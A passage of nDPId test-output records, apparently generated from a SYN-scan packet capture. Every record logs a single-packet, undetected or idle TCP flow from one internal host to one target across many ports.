-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 